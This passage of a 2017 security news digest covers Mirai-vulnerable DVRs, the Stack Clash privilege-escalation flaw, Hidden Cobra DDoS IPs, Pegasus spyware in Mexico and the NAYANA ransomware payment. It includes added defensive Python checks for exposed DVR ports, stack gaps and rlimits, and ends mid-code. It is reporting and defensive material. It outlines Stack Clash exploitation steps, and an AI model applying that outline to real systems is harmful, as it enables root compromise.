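src=203.0.113.7 dst=192.168.1.50 proto=tcp dport=9527 bytes=1200
src=192.168.1.20 dst=192.168.1.50 proto=tcp dport=80 bytes=500
src=198.51.100.9 dst=192.168.1.50 proto=tcp dport=12323 bytes=300
src=198.51.100.9 dst=192.168.1.50 proto=tcp dport=443 bytes=3000
src=192.0.2.33 dst=192.168.1.51 proto=udp dport=53 bytes=90
"""


def parse_flow(line):
    """Turn 'k=v k=v ...' into a dict with an integer destination port."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    fields["dport"] = int(fields["dport"])
    return fields


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def exposed_dvr_services(flow_text, dvr_hosts):
    """Return (src, dst, port, service) for external TCP connections to risky DVR ports."""
    findings = []
    for line in flow_text.splitlines():
        if not line.strip():
            continue
        flow = parse_flow(line)
        if flow["dst"] not in dvr_hosts or flow["proto"] != "tcp":
            continue
        if flow["dport"] not in DVR_RISK_PORTS or is_internal(flow["src"]):
            continue
        findings.append((flow["src"], flow["dst"], flow["dport"], DVR_RISK_PORTS[flow["dport"]]))
    return findings


if __name__ == "__main__":
    for finding in exposed_dvr_services(SAMPLE_FLOWS, {"192.168.1.50"}):
        print("exposed:", finding)
```

A hit on 9527 or 12323 from outside is the finding that matters most here, since the article notes those interfaces lead to a shell with the DVR login or Mirai-style default credentials; the fix is removing the port forward, not relying on the credentials.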

The researchers also suggest that BrickerBot, a piece of IoT malware targeting the same devices as Mirai but completely disabling them, was actually meant to be a healing worm, but didn’t work as intended. The issue, they say, is that DVRs run a cut-down version of busybox, which lacks commands for the functionality BrickerBot wants to use. The malware, however, was set to brick the device if it couldn’t fix its vulnerabilities.

The Pen Test Partners researchers also say they found a way to remotely fix Mirai vulnerable devices. However, they decided against publishing the underlying details because the very same method can be used to make Mirai even more potent than it already is, by providing it with persistence over reboots.


'Stack Clash' Flaws Allow Privilege Escalation on Unix Systems

20.6.2017 securityweek Vulnerability
Linux and other Unix-like operating systems are affected by a type of vulnerability that can be exploited by an attacker for root privilege escalation, Qualys warned on Monday.

The flaw, dubbed Stack Clash, is a memory management issue in Linux, OpenBSD, NetBSD, FreeBSD and Solaris on i386 and amd64 architectures. Affected Linux distributions include Red Hat, Debian, Ubuntu, SUSE, CentOS and Gentoo. Other operating systems and architectures could also be vulnerable.

The vulnerability is related to the memory region known as the stack, which grows automatically if an application requires more memory. The problem is that if the stack memory region grows too much, it can get too close to another region, which can result in the application confusing these regions.

This type of flaw, which attackers can exploit to overwrite the stack with another memory region by triggering a clash, has been known since 2005. After it was exploited again in 2010 (CVE-2010-2240), a protection called “stack guard page” was added to the Linux kernel to prevent stack overflow attacks. The stack guard page serves as a divider between a stack memory region and other regions.

However, researchers at Qualys discovered that the stack guard page protection can be bypassed and they developed several proof-of-concept (PoC) exploits to demonstrate it. The main Stack Clash vulnerability is tracked as CVE-2017-1000364, but there are several other flaws that are either directly related to it or independently exploitable.

The PoC code developed by Qualys shows how a local attacker can exploit the vulnerability to escalate privileges to root. However, the company believes remote attacks may also be possible against certain applications.

The PoC exploits will only be made public after users have had a chance to patch their systems. Technical details on Stack Clash have been made available by both Qualys and Grsecurity.

The developers of the affected operating systems have started releasing fixes and users have been advised to patch their installations. As a workaround, the hard RLIMIT_STACK and RLIMIT_AS resources of local users and remote services can be set to low values, but experts warned that it may be possible to bypass this mitigation.
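Two things an administrator can verify on a Linux host follow from the description above: how much unmapped space separates the bottom of the stack from the next mapping (the "divider" the guard page was meant to provide; the kernel fix for this issue widened the default gap to 1 MiB on 4 KiB pages), and whether the hard `RLIMIT_STACK` and `RLIMIT_AS` limits mentioned as a workaround are actually capped. The following is an added example for this page, not code from Qualys or Grsecurity. It parses a constructed `/proc/<pid>/maps` excerpt (addresses are illustrative) and, when run directly, the live maps of its own process; the 8 MiB and 4 GiB ceilings in `limits_capped` are assumed values to adjust per host, and the example does not itself attempt to trigger the condition.

```python
import resource

UNLIMITED = resource.RLIM_INFINITY

# Constructed /proc/<pid>/maps excerpt (not from the advisory); addresses are illustrative.
SAMPLE_MAPS = """\
5555555d4000-5555555d6000 rw-p 00000000 00:00 0
7ffff7a00000-7ffff7bc8000 r-xp 00000000 08:01 1311 /lib/x86_64-linux-gnu/libc-2.24.so
7ffff7fe0000-7ffff7fe3000 rw-p 00000000 00:00 0
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
"""


def parse_maps(text):
    """Return (start, end, name) triples from /proc/<pid>/maps text."""
    regions = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(None, 5)
        start, end = (int(x, 16) for x in fields[0].split("-"))
        name = fields[5].strip() if len(fields) > 5 else ""
        regions.append((start, end, name))
    return regions


def stack_gap(maps_text):
    """Unmapped bytes between the bottom of [stack] and the nearest mapping below it."""
    regions = parse_maps(maps_text)
    stack = next((r for r in regions if r[2] == "[stack]"), None)
    if stack is None:
        raise ValueError("no [stack] region in maps")
    below = [r for r in regions if r[1] <= stack[0]]
    if not below:
        return None  # nothing mapped beneath the stack at all
    nearest_end = max(r[1] for r in below)
    return stack[0] - nearest_end


def gap_is_sufficient(gap, min_gap=1 << 20):
    """True if the gap is at least min_gap bytes (1 MiB, the default the kernel fix introduced)."""
    return gap is None or gap >= min_gap


def hard_limits():
    """Hard RLIMIT_STACK and RLIMIT_AS of the current process."""
    return (resource.getrlimit(resource.RLIMIT_STACK)[1],
            resource.getrlimit(resource.RLIMIT_AS)[1])


def limits_capped(stack_hard, as_hard, max_stack=8 << 20, max_as=4 << 30):
    """Workaround check: both hard limits finite and at or below the (assumed) ceilings."""
    if stack_hard == UNLIMITED or as_hard == UNLIMITED:
        return False
    return stack_hard <= max_stack and as_hard <= max_as


if __name__ == "__main__":
    with open("/proc/self/maps") as f:
        live_gap = stack_gap(f.read())
    print("stack gap bytes:", live_gap, "ok" if gap_is_sufficient(live_gap) else "SMALL")
    stack_hard, as_hard = hard_limits()
    print("hard limits (stack, as):", (stack_hard, as_hard),
          "capped" if limits_capped(stack_hard, as_hard) else "not capped")
```

The gap measured this way is only the space visible to this process at this moment; the article's point is that a stack allowed to grow (a large hard `RLIMIT_STACK`) can cross that space, which is why the limit check belongs next to the gap check, and why the article warns the limit workaround alone may still be bypassable.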

Qualys recently reported finding a vulnerability that can be exploited by Sudo users on SELinux-enabled systems for root privilege escalation. The company pointed out that a combination of the Sudo flaw with the Stack Clash allows any local user (not just Sudo users) to escalate privileges on any affected Linux system (not just systems with SELinux enabled).


North Korea's DDoS Attacks Analyzed Based on IPs

20.6.2017 securityweek APT
Arbor Networks has used the IP addresses shared recently by United States authorities to analyze distributed denial-of-service (DDoS) attacks attributed to the North Korean government. The security firm believes the data may not be as useful for organizations as the U.S. hopes.

Earlier this month, the United States Computer Emergency Readiness Team (US-CERT) released a technical alert on behalf of the DHS and the FBI to warn organizations of North Korea’s Hidden Cobra activities, particularly its DDoS botnet infrastructure.

Hidden Cobra, a threat actor tracked by others as Lazarus Group, is believed to be behind several high-profile attacks, including the ones targeting Sony Pictures, Bangladesh’s central bank, and banks in Poland. Links have also been found between the group and the recent WannaCry ransomware attacks.

The US-CERT report focused on a DDoS tool dubbed DeltaCharlie. The organization has shared information on exploits, malware, IP addresses, file hashes, network signatures, and YARA rules associated with Hidden Cobra in an effort to help defenders detect the group’s attacks.

Data from Arbor Networks’ ATLAS infrastructure showed that 24 of the 632 IP addresses provided by US authorities were involved in at least one DDoS attack over a 105-day period between March 1 and June 13, 2017.

The company pointed out that its ATLAS infrastructure, which relies on data shared anonymously by nearly 400 globally distributed service providers, covers roughly one-third of Internet traffic, which means the actual number of IPs involved in attacks during this period is likely higher.

According to Arbor, 16 IPs participated in more than one of the 164 attacks observed by the company. The largest attack peaked at 4.3 Gbps, which is more than enough to disrupt unprotected systems, and the longest attack lasted for 44 hours.

While the largest concentration of IP addresses in the US-CERT report was in Russia, Arbor traced the highest percentage of IPs to Saudi Arabia (6 of 24) and the United Arab Emirates (5 of 24).

The IPs monitored by Arbor were involved in DDoS attacks on most days, but there were some periods with no activity. The longest period with no activity started on April 5, shortly after North Korea launched a missile into the Sea of Japan. While it’s unclear if the two events are in any way related, experts noted that DDoS attacks are often timed with significant geopolitical events.

Of the 164 DDoS attacks observed by researchers, nearly half were aimed at the United States, followed by the U.K., Australia, France, Saudi Arabia and Singapore.

SecurityWeek has reached out to several other DDoS protection companies, but none of them could immediately provide any information on the Hidden Cobra attacks.

Arbor said it conducted an analysis due to the fact that the US-CERT report, which the company has described as vague, was not clear on whether the IPs were bots or part of command and control (C&C) infrastructure, and it also failed to clarify if the IPs were “innocent” reflectors.

Arbor’s analysis – based on the types of attacks observed – suggests that the report lists open reflectors abused by DeltaCharlie and not the actual bots.

“This lack of context makes it difficult for responders to act. Security analysts would treat a list of command-and-control servers differently from a list of bots, and differently from a list of reflectors,” experts said. “Blindly loading such indicators into security systems could potentially cause more harm than good.”

This is not the first time the cybersecurity community has criticized a joint report from the FBI and the DHS. The report released late last year on GRIZZLY STEPPE activity, better known as Cozy Bear (APT29) and Fancy Bear (APT28 and Pawn Storm), failed to demonstrate that Russia was behind the U.S. election hacks.


Cloud Security Firm ShieldX Emerges From Stealth

20.6.2017 securityweek Security
ShieldX Networks Emerges From Stealth Mode With New Product to Protect Cloud Infrastructure

San Jose, CA-based cloud security start-up ShieldX Networks has today emerged from stealth with a new product, Apeiro. Apeiro takes microsegmentation as its baseline, and then layers additional security on top. In November 2015, the company completed a $9 million Series A financing round led by Bain Capital Ventures with participation from Aspect Ventures.

ShieldX delivers its security through microsegmentation that "provides full security controls, as well as visibility, automation and coordination across multiple cloud environments. As a result, a breach in one area of the network will not compromise other areas," claims the company.

ESG Labs has certified that Apeiro "supports VMware vSphere, OpenStack/KVM, and AWS environments, with additional cloud support on the horizon. Highly available and multi-tenant, Apeiro REST APIs support integration with DevOps-oriented processes." It also verifies that Apeiro "is fast and easy to deploy over an existing infrastructure (ShieldX boasts 15 minutes), and enables organizations to natively, automatically segment and secure cloud workloads at scale, across both physical and multi-cloud infrastructures."

But, claims ShieldX, microsegmentation alone is not enough. "Note that microsegmentation only restricts who can communicate to who and not what they say to each other," Dr. Ratinder Paul Singh Ahuja, CEO and founder of ShieldX told SecurityWeek. "This then creates the situation where a compromised system can still propagate malware because microsegmentation by itself doesn't inspect that level of detail in the communications between systems."

In a Friday blog post he gave an example. "The recent WannaCry malware propagated laterally within businesses using the Server Message Block (SMB) protocol. As a matter of policy, you are not going to use micro-segmentation to block the SMB port, or for example, the SQL port, in communications between applications and users in your network as those are used to carry legitimate traffic to conduct business. Yet these are common techniques used for exploits. So, if you now depend on microsegmentation alone to secure your data center or public cloud traffic, you could easily fall prey to WannaCry or the next generation of attack."

Apeiro provides deep packet inspection (DPI), visibility, policy management, and enforcement at cloud scale. Organizations can implement security policies on-demand, based on microsegmentation application-aware access control; threat detection from a combination of 10,000+ threat definitions; malware detection through integration with third-party products such as FireEye; TLS decryption/termination; and URL filtering. DLP is expected in a future release.

Although both the ShieldX announcement and the ESG Labs review specify 'FireEye', Ahuja told SecurityWeek that it is singled out only because many of ShieldX's customers already use FireEye. "Apeiro can integrate with other advanced malware detection technologies as well as offer that capability from the ShieldX cloud if customers don't have such systems in place," he said.

The 10,000+ threat definitions, he added, "are sourced commercially as well as from our own research. These are dynamically updated and pushed out to Apeiro installations from the ShieldX cloud."

"We chose ShieldX as our cloud security partner," says Joe Jozen, VP of Tokyo Electron Device Limited (TED), "because our customers want to leverage the power and cost saving benefits of cloud innovation without compromising security. The Tokyo 2020 Olympics are a perfect example of how the partnership between TED and ShieldX will be critical to enabling the secure storage and transfer of information while protecting against cyber threats to provide a safe, enjoyable and connected experience for attendees."

In May 2017, ShieldX was featured in Gartner's 'Cool Vendors in Cloud Security, 2017'. "ShieldX is a pure-play security vendor with a cross-cloud microsegmentation product branded Apeiro that functions as network security middleware to support hosts and containers," writes Gartner. It "will appeal to I&O and security and risk management leaders in enterprises that have a virtualized infrastructure requiring segmentation, especially where those clouds are or will be heterogeneous, or if the enterprise is more a Mode 2 (i.e., DevOps) style and needs Mode 2 security for it."


Hackers can spy on people through cameras, thanks to flaws in the control software

20.6.2017 Novinky/Bezpečnost Hacking
Computer pirates can relatively easily exploit flaws in Chinese-made IP cameras. This way they can spy, without the user's knowledge, on people in front of the lens. The security company F-Secure drew attention to the flaws.

Opticam i5 HD (photo: manufacturer's archive)

"The vulnerabilities allow an attacker to take control of the camera, watch the video and, in some cases, gain access to other devices on the same network," warned Pavel Bašta, analyst at the National Security Team CSIRT.CZ.

So far, the vulnerabilities have been found in two cameras from the Chinese company Foscam, specifically the Foscam C2 and Opticam i5 HD models.

As F-Secure's security researchers pointed out, far more IP cameras will be affected, because the same control software is used by several manufacturers. "It is likely that the vulnerabilities will also be present in other brands such as Chacon, 7links, Netis, Turbox, Thomson, Novodio, Nexxt, Ambientcam, Technaxx, Qcam, Ivue, Ebode and Sab," Bašta added.

Updates are still missing
This represents a fairly large security risk, because the flaws let computer pirates easily take control of a fairly large number of cameras. Whether the flaw has actually been exploited is not clear at the moment.

Users themselves cannot do much to protect themselves against the discovered holes. They must wait until the individual manufacturers release updates to the control software of their cameras, which can easily take several weeks.

Unfortunately, the only reliable defense in this case is to disconnect the cameras from the computer network.


Internet attacks may draw sanctions, the EU warned

19.6.2017 Novinky/Bezpečnost BigBrother
European Union countries have warned that they could respond jointly to unlawful acts in cyberspace, for example by imposing sanctions. This follows from the conclusions of Monday's meeting of the foreign ministers of the 28 member states in Luxembourg. The warning comes at a time when the US and others are discussing Russia's efforts to pursue its goals through various operations on the internet. China and North Korea are also mentioned in connection with operations in cyberspace.
"The EU is concerned by the increased ability and willingness of state and non-state actors to pursue their objectives through malicious activities in cyberspace," the foreign ministers of the 28 said. If such conduct were contrary to international law, the Union reserves the option of a joint response, they said.

The ministers also stressed that states should not knowingly allow their territory to be used for internationally wrongful acts using information and communication technologies.

International disputes in cyberspace
According to the conclusions adopted at Monday's meeting, the EU's response to malicious activities in cyberspace will make use of common foreign and security policy measures, including restrictive measures, i.e. sanctions, if necessary.

"The EU's joint response to malicious cyber activities will be proportionate to the scope, scale, duration, intensity, complexity, sophistication and impact of the cyber activity," the EU foreign ministers said.

They stressed that the Union is committed to settling international disputes in cyberspace by peaceful means and seeks to strengthen cooperation and reduce the risk of misinterpretation, escalation and conflict that may arise from incidents involving information and communication technologies.


The Internet in 2021: 4.6 billion users and 3.1 million DDoS attacks

19.6.2017 SecurityWorld Analýzy
By 2021 the number of internet users will grow to 4.6 billion and more than 27 billion devices will be connected, more than 50% of them Internet of Things devices. Machines will thus become the majority user of the internet for the first time, but people will still lead in data volume, consuming a full 95% of internet traffic. The amount of data transferred will triple globally by 2021 and reach 3.3 zettabytes per year, roughly the equivalent of 825 billion DVDs. Video will be the dominant content, making up 80% of internet traffic. These conclusions come from the regular Cisco Visual Networking Index study. It further predicts that, as data volumes grow, so will the number of DDoS cyber attacks, which use infected devices to flood a target with a large number of requests.
The Cisco Visual Networking Index (VNI) study has been mapping global data traffic regularly for 12 years. The current study focuses on the expected development between 2016 and 2021 and predicts the broad impact that ongoing digital transformation will have on the internet. This transformation will be the main driver of the steeply growing number of machine-to-machine (M2M) connections.

According to Cisco's estimates, healthcare will become the fastest-digitizing sector, driven by the spread of health monitors and medication dispensers and by connecting so-called first responders (growth of 30% per year). The second fastest-growing area will be connected vehicles and smart city applications (growth of 29% per year).

"With this study we open a window into the future of the internet. Through it we can look into a world where communication between billions of machines and devices is an everyday reality, but where the vast majority of content will still be consumed by people. We can look forward to a boom in entertainment gadgets such as augmented and virtual reality, and most households will enjoy 4K televisions. More people will choose tailored content through internet broadcasting. Their demands on connection speed and quality will grow with it, and technology companies and service providers must prepare for that," says Michal Stachník, General Manager of Cisco Czech Republic.

Video already makes up the majority of internet traffic; in 2016 it accounted for 67%. The growth trend will continue, and in 2021 the share will reach 80%. This growth will be strongly influenced by new media that rely on live transmission, such as streaming television, streaming by individual users and social networks. Live streaming will grow 15-fold between 2016 and 2021 and will make up 13% of all video traffic. Virtual and augmented reality will see a similar boom, with their traffic growing 20-fold. The number of 4K televisions will increase from 85 million in 2016 to 663 million in 2021. While they make up 15% of connected televisions today, in 2021 they will hold a 56% majority.

In 2016, 96 exabytes of data were transferred over the internet every month. According to the Cisco VNI study, this will almost triple to 278 exabytes by 2021. Annual IP traffic will thus be roughly 3.3 zettabytes. For perspective, one exabyte corresponds roughly to 36,000 years of HD video or 250,000,000 DVDs. In 2021, then, the internet will carry a volume of data comparable to almost 120 million years of HD video (roughly twice as long ago as Tyrannosaurus Rex lived). All of the internet's traffic would fit onto roughly 825 billion DVDs.

Already in 2016, mobile and other wireless devices generated the majority of internet traffic (62%). Their share will keep growing and will reach 73% in 2021. Related to this is a sharp rise in Wi-Fi hotspots: while about 85 million were in operation worldwide in 2016, by 2021 their number will rise to 526.2 million. The countries with the most hotspots in 2021 will be China (170 million), the USA (86 million), Japan (33 million) and France (30 million).

The study also compares the world's regions. The statistics show that in 2016, 44% of the world's population was connected to the internet. In 2021 the number of internet users will rise from the current 3.3 billion to 4.6 billion, so 58% of all people in the world will be connected. The number of connected devices per person will also grow significantly, from 2.3 devices (2016) to 3.5 (2021). The average connection speed will rise from 27.5 Mb/s to 53 Mb/s in 2021, and each person will account for 35.5 GB of data transferred per month.

In the Central and Eastern Europe (CEE) region the trend will be similar. In 2016, 60% of the population was connected, which will rise to 72% in 2021. Today every citizen in the CEE region has on average 2.5 devices connected to the internet; in 2021 it will be 3.8. The average connection will reach 45.5 Mb/s, and each person will account for 34.7 GB of data transferred.

Growing internet traffic will also be a major challenge for cybersecurity. Not only are attackers coming up with ever more sophisticated types of malware, but the strength of DDoS attacks keeps increasing too, averaging 1.2 Gb/s. A flow of that size can knock out most organizations. Peak strength grows by roughly 60% each year, and at the moment of the strongest attack its traffic can represent up to 18% of an entire country's traffic. The average size of a DDoS attack grows by up to 22% a year, which corresponds to the growth of global internet traffic (29%). Their number is rising as well: the forecast is about 3.1 million such attacks worldwide in 2021.


Mexican Government was spying on Journalists and Activists with Pegasus Surveillance software
20.6.2017 securityaffairs BigBrothers

Journalists and activists in Mexico accused the government of spying on them with the powerful surveillance software Pegasus developed by the NSO Group.
Journalists and activists in Mexico accused the government of spying on them with powerful surveillance software. According to the journalists, the authorities used Israeli spyware to hack their mobile devices. The surveillance software is the controversial Pegasus, developed by the Israeli surveillance firm NSO Group and sold exclusively to governments and law enforcement agencies.

NSO Group is owned by US private equity firm Francisco Partners Management. It made the headlines after the investigation conducted by The New York Times.

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

“There’s no check on this,” said Bill Marczak, a senior fellow at the Citizen Lab at the University of Toronto’s Munk School of Global Affairs. “Once NSO’s systems are sold, governments can essentially use them however they want. NSO can say they’re trying to make the world a safer place, but they are also making the world a more surveilled place.”

The discovery is the result of an investigation conducted by Mexican NGOs and the CitizenLab organization.

R3D, SocialTic, Article 19 and CitizenLab published a report that details the illegal surveillance operated by the Mexican government through the spyware.

Authorities had been sending malicious links to individuals’ phones in order to trick victims into opening specially crafted messages; in some cases, when a victim was not compromised, the attack also extended to family members.

“The targets received SMS messages that included links to NSO exploits paired with troubling personal and sexual taunts, messages impersonating official communications by the Embassy of the United States in Mexico, fake AMBER Alerts, warnings of kidnappings, and other threats,” states the report. “The operation also included more mundane tactics, such as messages sending fake bills for phone services and sex-lines. Some targets only received a handful of texts, while others were barraged with dozens of messages over more than one and a half years. A majority of the infection attempts, however, took place during two periods: August 2015 and April-July 2016.”

The Pegasus spyware leverages zero-day exploits to compromise both iOS and Android devices.

The government targeted individuals that exposed evidence on government corruption and activists who revealed human rights violations by the Mexican Government.

The researchers observed at least two periods of intense targeting:

Period 1 (August 2015) when the Mexican President was officially exonerated for his role in the “Casa Blanca” scandal on which Carmen Aristegui, a well-known reporter, had first reported, and Carlos Loret de Mola was questioning the government’s role in extrajudicial killings. Aristegui revealed that President Enrique Pena Nieto’s wife had bought a $7 million Mexico City mansion from a government contractor.
Period 2 (April-July 2016), when revelations of government involvement in human rights abuses and extra-judicial killings were made public.

According to the New York Times report, at least three Mexican federal agencies have purchased some $80 million of spyware from NSO Group since 2011.

Companies like the NSO Group operate in the dark, in a sort of “legal gray area.” Although the Israeli government exercises strict control over the export of such software, surveillance applications can be abused by threat actors and authoritarian regimes worldwide.

Let me close with the key findings of the report:

Over 76 messages with links to NSO Group’s exploit framework were sent to Mexican journalists, lawyers, and a minor child (NSO Group is a self-described “cyber warfare” company that sells government-exclusive spyware).
The targets were working on a range of issues that include investigations of corruption by the Mexican President, and the participation of Mexico’s Federal authorities in human rights abuses.
Some of the messages impersonated the Embassy of the United States of America to Mexico, others masqueraded as emergency AMBER Alerts about abducted children.
At least one target, the minor child of a target, was sent infection attempts, including a communication impersonating the United States Government, while physically located in the United States.


Stack Clash vulnerability allows an attacker to execute code as root
20.6.2017 securityaffairs Vulnerability

Stack Clash is a local privilege escalation flaw in Linux, BSD, Solaris and other open source systems that allows an attacker to execute code as root.
Linux, BSD, Solaris and other open source systems are vulnerable to a local privilege escalation vulnerability known as Stack Clash that allows an attacker to execute code as root.

Stack Clash is a local privilege escalation vulnerability tracked as CVE-2017-1000364 that affects some open source systems, including Linux, BSD, and Solaris.

Stack Clash affects the memory management of several OSs and can be exploited by attackers to corrupt memory and execute arbitrary code.

Security patches have been released today for many Linux and open source distros, and systems running Linux, OpenBSD, NetBSD, FreeBSD or Solaris on i386 or amd64 hardware should be updated soon.

Experts warn of the possibility to chain this flaw with other vulnerabilities to run arbitrary code with the highest privileges.

Researchers at Qualys who discovered this vulnerability have developed seven exploits and seven proofs of concept for this weakness.

“The exploits and proofs of concept that we developed in the course of our research are all Local Privilege Escalations: an attacker who has any kind of access to an affected system can exploit the Stack Clash vulnerability and obtain full root privileges,” states Qualys.

The stack is the memory region used by a program during its execution; it grows automatically when the program needs more stack memory. If this region grows too much it can interfere with the stack of another process, and an attacker can force the growth to overwrite another memory region.

“Why is it called the Stack Clash? The first step in exploiting this vulnerability is to collide, or clash, the stack with another memory region. Hence the name: the Stack Clash.” continues the analysis.
The attack bypasses the stack guard-page protection against stack-clashes implemented in Linux in 2010.

The proof-of-concept exploits consist of the following steps, as described in the security advisory published by Qualys:

“Clashing” the stack with another memory region: “we allocate memory until the stack reaches another memory region, or until another memory region reaches the stack;”

“Jumping” over the stack guard-page: “we move the stack-pointer from the stack and into the other memory region, without accessing the stack guard-page;”

“Smashing” the stack, or the other memory region: “we overwrite the stack with the other memory region, or the other memory region with the stack.”

Is it exploitable remotely?

The researchers do not know of any remotely exploitable application; however, they don’t exclude remote exploitation of Stack Clash.

“The one remote application that we did investigate (the Exim mail server) turned out to be unexploitable by sheer luck.” states the advisory.

In order to temporarily mitigate the attack, Qualys recommends increasing the size of the stack guard-page to 1MB at a minimum.

The advisory also recommends recompiling all userland code with the -fstack-check option in order to prevent the stack pointer from moving into other memory regions.


Web Hosting Company Pays $1 Million to Ransomware Hackers to Get Files Back
20.6.2017 thehackernews Ransomware

A South Korean web hosting provider has agreed to pay $1 million in bitcoins to hackers after a Linux ransomware infected its 153 servers, encrypting 3,400 business websites and their data hosted on them.
According to a blog post published by NAYANA, the web hosting company, this unfortunate event happened on 10th June, when ransomware hit its hosting servers and the attackers demanded 550 bitcoins (over $1.6 million) to unlock the encrypted files.
However, the company later negotiated with the cyber criminals and agreed to pay 397.6 bitcoins (around $1.01 million) in three installments to get their files decrypted.
The hosting company had already paid two installments at the time of writing and would pay the last installment after recovering data from two-thirds of its infected servers.
According to the security firm Trend Micro, the ransomware used in the attack was Erebus, which was first spotted in September last year and was seen in February this year with Windows User Account Control bypass capabilities.

Since the hosting servers were running on Linux kernel 2.6.24.2, researchers believe that the Erebus Linux ransomware might have used known vulnerabilities, such as Dirty COW, or local Linux exploits to take over root access on the system.
“The version of Apache NAYANA used is run as a user of nobody(uid=99), which indicates that a local exploit may have also been used in the attack,” researchers note.
“Additionally, NAYANA’s website uses Apache version 1.3.36 and PHP version 5.1.4, both of which were released back in 2006.”
Erebus, the ransomware primarily targeting users in South Korea, encrypts office documents, databases, archives, and multimedia files using the RSA-2048 algorithm and then appends them with a .ecrypt extension before displaying the ransom note.
“The file is first scrambled with RC4 encryption in 500kB blocks with randomly generated keys,” researchers say. “The RC4 key is then encoded with AES encryption algorithm, which is stored in the file. The AES key is again encrypted using RSA-2018 algorithm that is also stored in the file.”
The public key which is generated locally is shared, while the private key is encrypted using AES encryption and another randomly generated key.
According to analysis conducted by the Trend Micro researchers, decryption of infected files is not possible without getting hold of the RSA keys.
So, the only safe way of dealing with ransomware attacks is prevention. As we have previously recommended, the best defense against Ransomware is to create awareness within the organizations, as well as to maintain back-ups that are rotated regularly.
Most viruses are introduced by opening infected attachments or clicking on links to malware usually in spam emails. So, DO NOT CLICK on links provided in emails and attachments from unknown sources.
Moreover, ensure that your systems are running the latest version of installed applications.


A Decade Old Unix/Linux/BSD Root Privilege-Escalation Bug Discovered
20.6.2017 thehackernews Vulnerability
Security researchers have discovered more than a decade-old vulnerability in several Unix-based operating systems — including Linux, OpenBSD, NetBSD, FreeBSD and Solaris — which can be exploited by attackers to escalate their privileges to root, potentially leading to a full system takeover.
Dubbed Stack Clash, the vulnerability (CVE-2017-1000364) has been discovered in the way memory was being allocated on the stack for user space binaries.
Exploiting Stack Clash Bug to Gain Root Access
The explanation is simple: Each program uses a special memory region called the stack, which is used to store short-term data. It expands and contracts automatically during the execution of any program, depending upon the needs of that program.
According to researchers at Qualys, who discovered and reported this bug, a malicious program can attempt to use more memory space than available on the stack, which could overflow the memory, causing it to collide or clash with nearby memory regions and overwrite their content.
Moreover, the Stack Clash exploit can also bypass the stack guard-page, a memory management protection introduced in 2010, after this issue was exploited in 2005 and 2010.
"Unfortunately, a stack guard-page of a few kilobytes is insufficient: if the stack-pointer 'jumps' over the guard-page—if it moves from the stack into another memory region without accessing the guard-page—then no page-fault exception is raised and the stack extends into the other memory region," an advisory published by Qualys read.
The Stack Clash vulnerability requires local access to the vulnerable system for exploitation, but researchers said it could be exploited remotely depending upon the applications.
For example, a malicious customer with a low-privilege account at a web hosting company running a vulnerable system could exploit this vulnerability to gain control over other websites running on the same server, as well as remotely gain root access and execute malicious code directly.
Just yesterday, we reported how a web hosting company fell victim to a similar attack that infected its Linux servers with ransomware, forcing the company to pay more than $1 million in ransom to get its files back.
Attackers can also combine the Stack Clash bug with other critical vulnerabilities, like the Sudo vulnerability recently patched, and then run arbitrary code with the highest privileges, said Qualys researchers.
7 Proof-of-Concept Exploits
The researchers said they were able to develop seven exploits and seven proofs of concept (PoCs) for the Stack Clash vulnerability, which work on Linux, OpenBSD, NetBSD, FreeBSD and Solaris on 32-bit and 64-bit x86 processors.
However, the researchers have not yet published the exploits and proofs of concept, giving users and admins enough time to patch their systems before the Stack Clash exploits are made public.
The PoCs follow four steps, which include 'Clashing' the stack with another memory region, running the stack pointer to the stack’s start, 'Jumping' over the stack guard-page and 'Smashing' the stack or the other memory regions.
Distros and systems affected by Stack Clash include:
Sudo on Debian, Ubuntu, and CentOS
ld.so and most SUID-root binaries on Debian, Ubuntu, Fedora, and CentOS
Exim on Debian
rsh on Solaris 11 and so on
Red Hat Enterprise
The company also believes that other operating systems, including Microsoft's Windows, Apple's OS X/macOS and Google's Linux-based Android OS could also be vulnerable to Stack Clash, though it is yet to be confirmed.
Patch Available; Update Now
Many affected vendors have already issued security patches for the bug, so users and administrators are advised to install patches as soon as possible.
If security patches from your vendor are yet to be released, you can reboot your systems or manually apply stack limits to local users' applications. Simply set the hard RLIMIT_STACK and RLIMIT_AS of local users and remote services to a low value.
It is also recommended to recompile all userland code (ld.so, libraries, binaries) with the -fstack-check feature. This would prevent the stack pointer from moving into another memory region without accessing the stack guard-page and would kill Stack Clash dead.
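Both Stack Clash articles above mention the same interim workaround: set the hard RLIMIT_STACK and RLIMIT_AS of local users and remote services to a low value until the vendor patch and the -fstack-check rebuild are in place. The block below is an added example, not code from Qualys or from any of the distributions named; it shows how to clamp those two limits on a running process with Python's resource module (so that everything it spawns inherits them) and how to render the equivalent pam_limits entries for /etc/security/limits.conf. The 8 MiB stack and 4 GiB address-space values are illustrative assumptions, not figures from the advisory.

```python
"""Interim Stack Clash hardening: clamp the hard RLIMIT_STACK / RLIMIT_AS of a
process and emit matching pam_limits entries for local users.
Added example; not code from Qualys or from any affected distribution."""
import resource

KIB = 1024
MIB = 1024 * KIB


def clamp_hard_limit(res, max_bytes):
    """Lower the hard limit of resource `res` to at most `max_bytes`.

    A hard limit can be lowered by any process but raised only with
    CAP_SYS_RESOURCE, so this clamps instead of overwriting: a hard limit
    that is already stricter is kept. The soft limit is pulled down as well,
    because it may never exceed the hard one. Returns the (soft, hard) pair
    now in effect.
    """
    soft, hard = resource.getrlimit(res)
    inf = resource.RLIM_INFINITY
    new_hard = max_bytes if hard == inf else min(hard, max_bytes)
    new_soft = new_hard if soft == inf else min(soft, new_hard)
    resource.setrlimit(res, (new_soft, new_hard))
    return resource.getrlimit(res)


def clamp_stack_limit(max_bytes=8 * MIB):
    """Clamp only the stack limit (the part of the workaround that is cheap)."""
    return clamp_hard_limit(resource.RLIMIT_STACK, max_bytes)


def apply_stack_clash_limits(stack_max=8 * MIB, as_max=4096 * MIB):
    """Apply both limits to the calling process and its future children.
    The values are assumptions for illustration, not the advisory's numbers."""
    return {
        "stack": clamp_hard_limit(resource.RLIMIT_STACK, stack_max),
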